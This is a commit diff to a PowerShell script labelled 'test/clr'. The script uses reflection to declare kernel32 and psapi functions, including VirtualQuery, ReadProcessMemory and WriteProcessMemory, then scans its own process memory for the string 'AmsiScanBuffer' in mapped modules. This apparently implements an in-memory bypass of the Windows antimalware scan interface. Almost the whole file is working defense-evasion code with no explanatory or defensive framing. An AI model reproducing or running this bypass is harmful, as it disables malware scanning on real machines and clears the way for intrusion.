Update test/clr

test/clr

@@ -1,4 +1,3 @@
-
 $PAGE_READONLY = 0x02
 $PAGE_READWRITE = 0x04
 $PAGE_EXECUTE_READWRITE = 0x40
@@ -17,23 +16,11 @@ function IsReadable {
              ($protect -band $PAGE_GUARD) -ne $PAGE_GUARD)
 }
 
-function PatternMatch {
-    param ($buffer, $pattern, $index)
-    for ($i = 0; $i -lt $pattern.Length; $i++) {
-        if ($buffer[$index + $i] -ne $pattern[$i]) {
-            return $false
-        }
-    }
-    return $true
-}
 
-if ($PSVersionTable.PSVersion.Major -gt 2) {
-    
+
     $DynAssembly = New-Object System.Reflection.AssemblyName("Win32")
     $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)    
-    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)
-
-    
+    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("Win32", $False)   
     $TypeBuilder = $ModuleBuilder.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
     [void]$TypeBuilder.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
     [void]$TypeBuilder.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
@@ -42,9 +29,7 @@ if ($PSVersionTable.PSVersion.Major -gt 2) {
     [void]$TypeBuilder.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
     [void]$TypeBuilder.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
     [void]$TypeBuilder.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
-    $MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()
-
-    
+    $MEMORY_INFO_BASIC_STRUCT = $TypeBuilder.CreateType()  
     $TypeBuilder = $ModuleBuilder.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
     [void]$TypeBuilder.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
     [void]$TypeBuilder.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
@@ -57,76 +42,50 @@ if ($PSVersionTable.PSVersion.Major -gt 2) {
     [void]$TypeBuilder.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
     [void]$TypeBuilder.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
     [void]$TypeBuilder.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
-    $SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()
-
-    
+    $SYSTEM_INFO_STRUCT = $TypeBuilder.CreateType()    
     $TypeBuilder = $ModuleBuilder.DefineType("Win32.Kernel32", "Public, Class")
     $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
     $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError")
-    $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, "kernel32.dll", [Reflection.FieldInfo[]]@($SetLastError), @($True))
-
-    
+    $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, "kernel32.dll", [Reflection.FieldInfo[]]@($SetLastError), @($True))   
     $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("VirtualProtect", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [bool], [Type[]]@([IntPtr], [IntPtr], [Int32], [Int32].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
     $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
-
-    
     $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetCurrentProcess", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@(), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
-    
-    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
-
-    
+    $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)    
     $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("VirtualQuery", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@([IntPtr], [Win32.MEMORY_INFO_BASIC].MakeByRefType(), [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
     $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
-
-    
     $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetSystemInfo", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [void], [Type[]]@([Win32.SYSTEM_INFO].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
     $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
-
-    
     $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("GetMappedFileName", "psapi.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [System.Text.StringBuilder], [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
     $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
-
-    
     $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("ReadProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
     $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
-
-    
     $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod("WriteProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
     $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
-    $Kernel32 = $TypeBuilder.CreateType()
     
+    $Kernel32 = $TypeBuilder.CreateType()
     $aa = "AmsiScanBuffer"
     $signature = [System.Text.Encoding]::UTF8.GetBytes("$aa")
     $hProcess = [Win32.Kernel32]::GetCurrentProcess()
-
-    
     $sysInfo = New-Object Win32.SYSTEM_INFO
     [void][Win32.Kernel32]::GetSystemInfo([ref]$sysInfo)
-
     
+
     $memoryRegions = @()
     $address = [IntPtr]::Zero
-
-    
     while ($address.ToInt64() -lt $sysInfo.lpMaximumApplicationAddress.ToInt64()) {
         $memInfo = New-Object Win32.MEMORY_INFO_BASIC
         if ([Win32.Kernel32]::VirtualQuery($address, [ref]$memInfo, [System.Runtime.InteropServices.Marshal]::SizeOf($memInfo))) {
             $memoryRegions += $memInfo
         }
-        
         $address = New-Object IntPtr($memInfo.BaseAddress.ToInt64() + $memInfo.RegionSize.ToInt64())
     }
-
     $count = 0
-
     
+
     foreach ($region in $memoryRegions) {
-        
         if (-not (IsReadable $region.Protect $region.State)) {
-        
             continue
         }
-        
         $pathBuilder = New-Object System.Text.StringBuilder $MAX_PATH
         if ([Win32.Kernel32]::GetMappedFileName($hProcess, $region.BaseAddress, $pathBuilder, $MAX_PATH) -gt 0) {
             $path = $pathBuilder.ToString()
@@ -159,4 +118,5 @@ if ($PSVersionTable.PSVersion.Major -gt 2) {
             }
         }
     }
-}
+
+$count